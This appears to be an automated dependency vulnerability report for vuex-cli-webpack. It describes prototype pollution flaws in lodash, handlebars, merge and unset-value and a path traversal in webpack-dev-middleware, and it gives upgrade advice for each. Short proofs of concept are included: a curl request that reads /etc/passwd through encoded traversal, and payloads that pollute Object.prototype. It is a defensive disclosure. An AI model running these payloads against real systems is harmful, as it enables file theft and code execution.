  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 liftoff@2.5.0 findup-sync@2.0.0 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 readdirp@2.2.1 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 liftoff@2.5.0 findup-sync@2.0.0 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0

Overview

Affected versions of this package are vulnerable to Prototype Pollution via the unset function in index.js, because it allows access to object prototype properties.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade unset-value to version 2.0.1 or higher.

References

high severity

Path Traversal

  • Vulnerable module: webpack-dev-middleware
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack-dev-middleware@1.12.2

Overview

Affected versions of this package are vulnerable to Path Traversal due to insufficient validation of the supplied URL address before returning the local file. This issue allows accessing any file on the developer's machine. The middleware can operate with either the physical filesystem or a virtualized in-memory memfs filesystem. When the writeToDisk configuration option is set to true, the physical filesystem is utilized. The getFilenameFromUrl method parses the URL and constructs the local file path by stripping the public path prefix from the URL and appending the unescaped path suffix to the outputPath. Since the URL is not unescaped and normalized automatically before calling the middleware, it is possible to use %2e and %2f sequences to perform a path traversal attack.

Notes:

  1. This vulnerability is exploitable without any specific configurations, allowing an attacker to access and exfiltrate content from any file on the developer's machine.

  2. If the development server is exposed on a public IP address or 0.0.0.0, an attacker on the local network can access the files without victim interaction.

  3. If the server permits access from third-party domains, a malicious link could lead to local file exfiltration when visited by the victim.

PoC

A blank project can be created containing the following configuration file webpack.config.js:

module.exports = { devServer: { devMiddleware: { writeToDisk: true } } };

When started, it is possible to access any local file, e.g. /etc/passwd:

$ curl localhost:8080/public/..%2f..%2f..%2f..%2f../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin

Remediation

Upgrade webpack-dev-middleware to version 5.3.4, 6.1.2, 7.1.0 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: handlebars
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution. Templates may alter an Objects' prototype, thus allowing an attacker to execute arbitrary code on the server.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade handlebars to version 3.0.7, 4.0.13, 4.1.2 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: handlebars
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0

Overview

handlebars is a extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution. Templates may alter an Object's __proto__ and __defineGetter__ properties, which may allow an attacker to execute arbitrary code on the server through crafted payloads.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as _proto_, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named _proto_ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to _proto_.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade handlebars to version 4.3.0, 3.0.8 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: lodash
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 inquirer@0.11.4 lodash@3.10.1

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.

PoC by Snyk

const mergeFn = require('lodash').defaultsDeep;
const payload = '{"constructor": {"prototype": {"a0": true}}}'

function check() {
    mergeFn({}, JSON.parse(payload));
    if (({})[`a0`] === true) {
        console.log(`Vulnerable to Prototype Pollution via ${payload}`);
    }
  }

check();

For more information, check out our blog post

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash to version 4.17.12 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: lodash
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 inquirer@0.11.4 lodash@3.10.1

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution via the set and setwith functions due to improper user input sanitization.

PoC

lod = require('lodash')
lod.set({}, "__proto__[test2]", "456")
console.log(Object.prototype)

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash to version 4.17.17 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: lodash
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 inquirer@0.11.4 lodash@3.10.1

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution. The functions merge, mergeWith, and defaultsDeep could be tricked into adding or modifying properties of Object.prototype. This is due to an incomplete fix to CVE-2018-3721.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash to version 4.17.11 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: lodash.merge
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 lodash.merge@3.3.2
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack-merge@0.14.1 lodash.merge@3.3.2

Overview

lodash.merge is a Lodash method _.merge exported as a Node.js module.

Affected versions of this package are vulnerable to Prototype Pollution. The functions merge, mergeWith, and defaultsDeep could be tricked into adding or modifying properties of Object.prototype. This is due to an incomplete fix to CVE-2018-3721.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash.merge to version 4.6.2 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: merge
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 sane@1.7.0 exec-sh@0.2.2 merge@1.2.1

Overview

merge is a library that allows you to merge multiple objects into one, optionally creating a new cloned object. Similar to the jQuery.extend but more flexible. Works in Node.js and the browser.

Affected versions of this package are vulnerable to Prototype Pollution via _recursiveMerge .

PoC:

const merge = require('merge');

const payload2 = JSON.parse('{"x": {"__proto__":{"polluted":"yes"}}}');

let obj1 = {x: {y:1}};

console.log("Before : " + obj1.polluted);
merge.recursive(obj1, payload2);
console.log("After : " + obj1.polluted);
console.log("After : " + {}.polluted);

Output:

Before : undefined
After : yes
After : yes

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade merge to version 2.1.1 or higher.

References

high severity

Code Injection

  • Vulnerable module: lodash
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 inquirer@0.11.4 lodash@3.10.1

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

